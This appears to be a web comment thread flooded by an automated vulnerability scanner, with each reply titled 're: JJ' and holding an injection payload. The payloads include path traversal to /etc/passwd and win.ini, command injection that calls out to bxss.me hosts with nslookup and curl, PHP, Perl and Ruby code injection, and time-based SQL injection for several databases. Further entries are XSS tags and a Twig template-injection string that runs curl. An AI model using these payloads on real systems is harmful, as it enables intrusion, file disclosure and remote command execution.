../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
${10000357+9999251}
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
echo blpluq$()\ unefft\nz^xyu||a #' &echo blpluq$()\ unefft\nz^xyu||a #|" &echo blpluq$()\ unefft\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
&echo miothx$()\ cywttv\nz^xyu||a #' &echo miothx$()\ cywttv\nz^xyu||a #|" &echo miothx$()\ cywttv\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
)
re: JJ
|echo wovfmg$()\ uydiil\nz^xyu||a #' |echo wovfmg$()\ uydiil\nz^xyu||a #|" |echo wovfmg$()\ uydiil\nz^xyu||a #
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
!(()&&!|*|*|
re: JJ
(nslookup hiteukhppqayf46d87.bxss.me||perl -e "gethostbyname('hiteukhppqayf46d87.bxss.me')")
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
$(nslookup hitybvhqkdptoa08a5.bxss.me||perl -e "gethostbyname('hitybvhqkdptoa08a5.bxss.me')")
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
&nslookup hitsjjrvhuovkd88d1.bxss.me&'\"`0&nslookup hitsjjrvhuovkd88d1.bxss.me&`'
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
&(nslookup hitwvhrbwfkwgd2906.bxss.me||perl -e "gethostbyname('hitwvhrbwfkwgd2906.bxss.me')")&'\"`0&(nslookup hitwvhrbwfkwgd2906.bxss.me||perl -e "gethostbyname('hitwvhrbwfkwgd2906.bxss.me')")&`'
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
|(nslookup hitmelhvvkgftccf30.bxss.me||perl -e "gethostbyname('hitmelhvvkgftccf30.bxss.me')")
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
`(nslookup hitjmqbsczrbpfe836.bxss.me||perl -e "gethostbyname('hitjmqbsczrbpfe836.bxss.me')")`
re: JJ
file:///etc/passwd
re: JJ
'.gethostbyname(lc('hitbv'.'pgrmfmtm178ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(84).chr(120).chr(80).'
re: JJ
;(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")|(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")&(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
".gethostbyname(lc("hitgk"."carwukznb9e3c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(76).chr(98).chr(65)."
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
/WEB-INF/web.xml
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/etc/shells
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
c:/windows/win.ini
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
"+"A".concat(70-3).concat(22*4).concat(118).concat(74).concat(120).concat(89)+(require"socket"
Socket.gethostbyname("hitwn"+"flwxevunc132d.bxss.me.")[3].to_s)+"
re: JJ
bxss.me
re: JJ
bxss.me/t/xss.html?%00
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(116).concat(82).concat(108).concat(89)+(require'socket'
Socket.gethostbyname('hitxf'+'yevgrihle479b.bxss.me.')[3].to_s)+'
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
';print(md5(31337));$a='
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
";print(md5(31337));$a="
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
${@print(md5(31337))}
re: JJ
'"
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
${@print(md5(31337))}\
re: JJ
<!--
re: JJ
WEB-INF/web.xml
re: JJ
'.print(md5(31337)).'
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+880-880-1=0+0+0+1 --
re: JJ
-1 OR 3+880-880-1=0+0+0+1 --
re: JJ
-1 OR 2+68-68-1=0+0+0+1
re: JJ
-1 OR 3+68-68-1=0+0+0+1
re: JJ
-1' OR 2+147-147-1=0+0+0+1 --
re: JJ
-1' OR 3+147-147-1=0+0+0+1 --
re: JJ
-1' OR 2+120-120-1=0+0+0+1 or 'GmL98q1T'='
re: JJ
-1' OR 3+120-120-1=0+0+0+1 or 'GmL98q1T'='
re: JJ
-1" OR 2+681-681-1=0+0+0+1 --
re: JJ
-1" OR 3+681-681-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
zZwf0JGJ'; waitfor delay '0:0:15' --
re: JJ
-5 OR 809=(SELECT 809 FROM PG_SLEEP(15))--
re: JJ
-5) OR 270=(SELECT 270 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: JJ
zPOkRvjm' OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: JJ
TItIieuD') OR 951=(SELECT 951 FROM PG_SLEEP(15))--
re: JJ
B73Mklnh')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@0mnKk
re: JJ
16K782NYS0
re: JJ
response.write(9382483*9483363)
re: JJ
'+response.write(9382483*9483363)+'
re: JJ
"+response.write(9382483*9483363)+"
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
${9999335+9999374}
re: JJ
file:///etc/passwd
re: JJ
../
re: JJ
)
re: JJ
!(()&&!|*|*|
re: JJ
^(#$!@#$)(()))******
re: JJ
redirtest.acx
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: JJ
echo eugcpc$()\ bgrdzp\nz^xyu||a #' &echo eugcpc$()\ bgrdzp\nz^xyu||a #|" &echo eugcpc$()\ bgrdzp\nz^xyu||a #
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: JJ
'.gethostbyname(lc('hitcw'.'kdjhqikbbb937.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(81).chr(107).chr(86).'
re: JJ
&echo xsmrja$()\ gjcsof\nz^xyu||a #' &echo xsmrja$()\ gjcsof\nz^xyu||a #|" &echo xsmrja$()\ gjcsof\nz^xyu||a #
re: JJ
/etc/shells
re: JJ
".gethostbyname(lc("hittl"."zmjveheuc88c3.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(75).chr(103).chr(65)."
re: JJ
|echo xnvuso$()\ xbmktp\nz^xyu||a #' |echo xnvuso$()\ xbmktp\nz^xyu||a #|" |echo xnvuso$()\ xbmktp\nz^xyu||a #
re: JJ
../../../../../../../../../../../../../../etc/shells
re: JJ
gethostbyname(lc('hitvb'.'yvvaotcn7d951.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(101).chr(76)
re: JJ
expr 9000509150 - 981501
re: JJ
c:/windows/win.ini
re: JJ
(nslookup -q=cname hitescwhxkhsff5503.bxss.me||curl hitescwhxkhsff5503.bxss.me))
re: JJ
bxss.me
re: JJ
ctime
sleep
p0
(I30
tp1
Rp2
.
re: JJ
$(nslookup -q=cname hitsgzjzcgbpfa3946.bxss.me||curl hitsgzjzcgbpfa3946.bxss.me)
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
&nslookup -q=cname hitbhtunkfbdge95ab.bxss.me&'\"`0&nslookup -q=cname hitbhtunkfbdge95ab.bxss.me&`'
re: JJ
http://bxss.me/t/fit.txt?.jpg
re: JJ
&(nslookup -q=cname hitcczhzzsipi26295.bxss.me||curl hitcczhzzsipi26295.bxss.me)&'\"`0&(nslookup -q=cname hitcczhzzsipi26295.bxss.me||curl hitcczhzzsipi26295.bxss.me)&`'
re: JJ
|(nslookup -q=cname hitekkobsaibs574ed.bxss.me||curl hitekkobsaibs574ed.bxss.me)
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
`(nslookup -q=cname hitpvyihswlvj6c169.bxss.me||curl hitpvyihswlvj6c169.bxss.me)`
re: JJ
'"()
re: JJ
';print(md5(31337));$a='
re: JJ
;(nslookup -q=cname hitgvmqmznmls75501.bxss.me||curl hitgvmqmznmls75501.bxss.me)|(nslookup -q=cname hitgvmqmznmls75501.bxss.me||curl hitgvmqmznmls75501.bxss.me)&(nslookup -q=cname hitgvmqmznmls75501.bxss.me||curl hitgvmqmznmls75501.bxss.me)
re: JJ
'&&sleep(27*1000)*sqvfbn&&'
re: JJ
";print(md5(31337));$a="
re: JJ
|(nslookup${IFS}-q${IFS}cname${IFS}hitzpfjhjmubab912b.bxss.me||curl${IFS}hitzpfjhjmubab912b.bxss.me)
re: JJ
"&&sleep(27*1000)*zhluux&&"
re: JJ
${@print(md5(31337))}
re: JJ
&(nslookup${IFS}-q${IFS}cname${IFS}hitkbkdooyjdgabb24.bxss.me||curl${IFS}hitkbkdooyjdgabb24.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkbkdooyjdgabb24.bxss.me||curl${IFS}hitkbkdooyjdgabb24.bxss.me)&`'
re: JJ
'||sleep(27*1000)*qttldj||'
re: JJ
${@print(md5(31337))}\
re: JJ
"||sleep(27*1000)*lmchxk||"
re: JJ
'.print(md5(31337)).'
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
bxss.me/t/xss.html?%00
re: JJ
"+"A".concat(70-3).concat(22*4).concat(102).concat(67).concat(105).concat(71)+(require"socket"
Socket.gethostbyname("hitsv"+"kmehzdkw4bd00.bxss.me.")[3].to_s)+"
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(107).concat(67).concat(120).concat(84)+(require'socket'
Socket.gethostbyname('hityz'+'taebibbob1143.bxss.me.')[3].to_s)+'
re: JJ
'A'.concat(70-3).concat(22*4).concat(122).concat(76).concat(116).concat(85)+(require'socket'
Socket.gethostbyname('hitjr'+'ifnsyctq79be7.bxss.me.')[3].to_s)
re: JJ
replies
re: JJ
'"
re: JJ
replies�
re: JJ
<!--
re: JJ
replies/.
re: JJ
'"()&%<zzz><ScRiPt >Iz0t(9680)</ScRiPt>
re: JJ
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hittrhvfcstydfc3c3.bxss.me")}}
re: JJ
'"()&%<zzz><ScRiPt >Iz0t(9230)</ScRiPt>
re: JJ
9446178
re: JJ
EhtNXyFO
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
*1
re: JJ
-1 OR 5*5=25 --
re: JJ
-1 OR 5*5=26 --
re: JJ
-1 OR 5*5=25
re: JJ
-1 OR 5*5=26
re: JJ
*if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
-1 waitfor delay '0:0:15' --
re: JJ
yF8YII1Q'; waitfor delay '0:0:15' --
re: JJ
-1 OR 725=(SELECT 725 FROM PG_SLEEP(15))--
re: JJ
-1) OR 11=(SELECT 11 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 758=(SELECT 758 FROM PG_SLEEP(15))--
re: JJ
YBmYCcDH' OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: JJ
1IDpddsP') OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: JJ
vWY1zZCH')) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
'"
re: JJ
@@0G89X
re: JJ
(select 198766*667891)
re: JJ
(select 198766*667891 from DUAL)